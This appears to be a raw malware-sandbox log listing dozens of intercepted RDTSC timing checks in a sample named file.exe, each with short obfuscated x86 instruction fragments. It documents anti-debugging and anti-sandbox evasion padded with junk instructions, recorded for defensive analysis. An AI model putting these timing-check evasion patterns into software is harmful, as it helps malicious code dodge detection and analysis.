Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78961E second address: 789622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789622 second address: 7705D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D27BDh] 0x0000000f call dword ptr [ebp+122D31B5h] 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F66E8C719DCh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4B8A second address: 7C4B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4B94 second address: 7C4BBE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66E8C719D6h 0x00000008 ja 00007F66E8C719D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66E8C719E2h 0x00000017 jg 00007F66E8C719D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5128 second address: 7C5160 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F66E8838CFFh 0x0000000c jnp 00007F66E8838CE6h 0x00000012 jmp 00007F66E8838CF3h 0x00000017 pushad 0x00000018 jmp 00007F66E8838CF0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C52B7 second address: 7C52BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C540E second address: 7C5412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C552A second address: 7C5530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB9A4 second address: 7CB9CB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8838CE6h 0x00000008 jc 00007F66E8838CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F66E8838CF7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A37F second address: 74A396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA654 second address: 7CA658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA658 second address: 7CA660 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA921 second address: 7CA942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA942 second address: 7CA95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA95E second address: 7CA962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAC86 second address: 7CAC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE03 second address: 7CAE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE09 second address: 7CAE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE0D second address: 7CAE2A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8838CE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66E8838CEEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE2A second address: 7CAE51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E3h 0x00000007 jmp 00007F66E8C719DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB156 second address: 7CB15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB15A second address: 7CB160 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB41A second address: 7CB420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB6AC second address: 7CB6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F66E8C719E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE63B second address: 7CE659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CF0h 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F66E8838CE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE659 second address: 7CE65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE65D second address: 7CE668 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE668 second address: 7CE66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7452BF second address: 7452C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3AF1 second address: 7D3B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F66E8C719D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3B16 second address: 7D3B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BD13 second address: 74BD17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BD17 second address: 74BD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F66E8838CF3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BD34 second address: 74BD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BD38 second address: 74BD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26FE second address: 7D2742 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66E8C719E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F66E8C719E9h 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F66E8C719D6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F66E8C719D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2742 second address: 7D2746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2746 second address: 7D274C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D274C second address: 7D2758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2758 second address: 7D275C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2F64 second address: 7D2F6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2F6A second address: 7D2F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2F70 second address: 7D2F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2F74 second address: 7D2F80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2F80 second address: 7D2F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jo 00007F66E8838CF2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34CC second address: 7D34E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34E6 second address: 7D34FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34FB second address: 7D3516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F66E8C719E5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D889F second address: 7D88A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D88A5 second address: 7D88B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F66E8C719DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D88B9 second address: 7D88DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CEEh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F66E8838CEAh 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D88DF second address: 7D88E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D88E3 second address: 7D8904 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 jmp 00007F66E8838CF7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8A66 second address: 7D8A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F66E8C719D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8BB6 second address: 7D8BDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66E8838CFDh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F66E8838CF5h 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD9D1 second address: 7DD9D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F334 second address: 74F33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DCDF1 second address: 7DCDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD513 second address: 7DD53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66E8838CF8h 0x0000000e ja 00007F66E8838CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD53A second address: 7DD53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E13F4 second address: 7E13F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0E24 second address: 7E0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0E28 second address: 7E0E32 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51B5 second address: 7E51CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E1h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51CB second address: 7E51D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5308 second address: 7E531E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F66E8C719DCh 0x00000010 jns 00007F66E8C719D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E531E second address: 7E5337 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CE8h 0x00000008 pushad 0x00000009 jnl 00007F66E8838CE6h 0x0000000f jne 00007F66E8838CE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5337 second address: 7E533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E543A second address: 7E5453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F66E8838CEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5453 second address: 7E5457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5457 second address: 7E545D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EC6 second address: 788ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788ECA second address: 788EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jbe 00007F66E8838CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FD7 second address: 788FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FDB second address: 788FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FE1 second address: 788FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FE7 second address: 788FFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788FFB second address: 789000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE2ED second address: 7EE2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE2F3 second address: 7EE30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F66E8C719E4h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC1D9 second address: 7EC1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8838CF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC1F2 second address: 7EC1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC7FE second address: 7EC823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F66E8838CFBh 0x0000000b jmp 00007F66E8838CEBh 0x00000010 jmp 00007F66E8838CEAh 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC823 second address: 7EC82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECAB9 second address: 7ECAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8838CF9h 0x0000000d jno 00007F66E8838CEEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECDF3 second address: 7ECDFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECDFC second address: 7ECE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED0A0 second address: 7ED0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED740 second address: 7ED74A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED74A second address: 7ED750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDCEA second address: 7EDD16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F66E8838CF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F66E8838CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDD16 second address: 7EDD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F66E8C719DFh 0x0000000f jmp 00007F66E8C719DAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2735 second address: 7F2755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F66E8838CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66E8838CF4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2755 second address: 7F2763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F66E8C719D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2763 second address: 7F2769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F559E second address: 7F55A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F55A6 second address: 7F55B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66E8838CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F57FB second address: 7F57FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C4B second address: 7F5C6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CE6h 0x00000008 jmp 00007F66E8838CF8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5EFA second address: 7F5F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F66E8C719E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007F66E8C719D6h 0x00000017 jmp 00007F66E8C719E7h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F3C second address: 7F5F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5F42 second address: 7F5F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
